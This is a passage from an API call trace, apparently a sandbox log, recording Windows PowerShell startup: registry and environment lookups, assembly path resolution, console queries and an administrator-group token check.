lplpBuffer=0xedb08*=0x2aaeecc, puLen=0xedb00) returned 1 [0080.704] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0080.704] VerLanguageNameW (in: wLang=0x0, szLang=0x1cf5e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0080.705] CoTaskMemFree (pv=0x1cf5e0) [0080.705] VerQueryValueW (in: pBlock=0x2aaee30, lpSubBlock="\\", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2aaee58, puLen=0xedb50) returned 1 [0080.728] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0080.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.770] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xeda28 | out: phkResult=0xeda28*=0x308) returned 0x0 [0080.772] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xeda18 | out: phkResult=0xeda18*=0x30c) returned 0x0 [0080.772] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedaa8 | out: phkResult=0xedaa8*=0x310) returned 0x0 [0080.776] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed9ec, lpData=0x0, lpcbData=0xed9e8*=0x0 | out: lpType=0xed9ec*=0x1, lpData=0x0, lpcbData=0xed9e8*=0x56) returned 0x0 [0080.777] CoTaskMemAlloc (cb=0x5a) returned 0x1c6d80 [0080.777] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed9bc, lpData=0x1c6d80, lpcbData=0xed9b8*=0x56 | out: lpType=0xed9bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed9b8*=0x56) returned 0x0 [0080.777] CoTaskMemFree (pv=0x1c6d80) [0080.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.908] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0080.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.908] CoTaskMemFree (pv=0x1f7410) [0081.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0081.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0081.488] CoTaskMemAlloc (cb=0x104) returned 0x1f7520 [0081.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.488] CoTaskMemFree (pv=0x1f7520) [0081.489] CoTaskMemAlloc (cb=0x104) returned 0x1f7520 [0081.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.489] CoTaskMemFree (pv=0x1f7520) [0081.517] CoTaskMemAlloc (cb=0x104) returned 0x1f7520 [0081.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.517] CoTaskMemFree (pv=0x1f7520) [0081.518] CoTaskMemAlloc (cb=0x104) returned 0x1f7520 [0081.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.518] CoTaskMemFree (pv=0x1f7520) [0081.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.519] CoTaskMemFree (pv=0x1f7520) [0081.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0081.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0081.643] CoTaskMemAlloc (cb=0x104) returned 0x1f7520 [0081.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.643] CoTaskMemFree (pv=0x1f7520) [0081.648] CoTaskMemAlloc (cb=0x104) returned 0x1f7520 [0081.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7520, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.648] CoTaskMemFree (pv=0x1f7520) [0081.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0081.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0082.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0082.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0082.105] wcscpy_s (in: _Destination=0xecb58, _SizeInWords=0x1e, _Source="Microsoft.PowerShell.Commands" | out: _Destination="Microsoft.PowerShell.Commands") returned 0x0 [0082.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0082.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0082.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0082.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0082.474] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.474] CoTaskMemFree (pv=0x1f7740) [0082.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0082.561] SetErrorMode (uMode=0x1) returned 0x1 [0082.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xed980 | out: lpFileInformation=0xed980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0082.562] SetErrorMode (uMode=0x1) returned 0x1 [0082.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.731] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.731] CoTaskMemFree (pv=0x1f7740) [0082.739] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.739] CoTaskMemFree (pv=0x1f7740) [0082.739] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.739] CoTaskMemFree (pv=0x1f7740) [0082.743] CoCreateGuid (in: pguid=0xedd48 | out: pguid=0xedd48*(Data1=0xf126deb2, Data2=0x409c, Data3=0x4a9f, Data4=([0]=0x9b, [1]=0xa6, [2]=0x1e, [3]=0x3c, [4]=0x9b, [5]=0x58, [6]=0x45, [7]=0xc3))) returned 0x0 [0082.750] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.750] CoTaskMemFree (pv=0x1f7740) [0082.753] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.753] CoTaskMemFree (pv=0x1f7740) [0082.756] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.756] CoTaskMemFree (pv=0x1f7740) [0082.762] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0082.764] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xed9f0 | out: lpConsoleScreenBufferInfo=0xed9f0) returned 1 [0082.769] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0082.769] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xed9f0 | out: lpConsoleScreenBufferInfo=0xed9f0) returned 1 [0082.771] GetVersionExW (in: lpVersionInformation=0xed980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0082.773] GetCurrentProcess () returned 0xffffffffffffffff [0082.774] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xeda18 | out: TokenHandle=0xeda18*=0x324) returned 1 [0082.778] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed938 | out: TokenInformation=0x0, ReturnLength=0xed938) returned 0 [0082.779] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x199380 [0082.779] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x199380, TokenInformationLength=0x4, ReturnLength=0xed938 | out: TokenInformation=0x199380, ReturnLength=0xed938) returned 1 [0082.781] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xeda98 | out: phNewToken=0xeda98*=0x320) returned 1 [0082.781] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed938 | out: TokenInformation=0x0, ReturnLength=0xed938) returned 0 [0082.781] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1993b0 [0082.781] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x1993b0, TokenInformationLength=0x4, ReturnLength=0xed938 | out: TokenInformation=0x1993b0, ReturnLength=0xed938) returned 1 [0082.782] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2b89bd8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xedaa8 | out: IsMember=0xedaa8) returned 1 [0082.782] CloseHandle (hObject=0x320) returned 1 [0082.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c 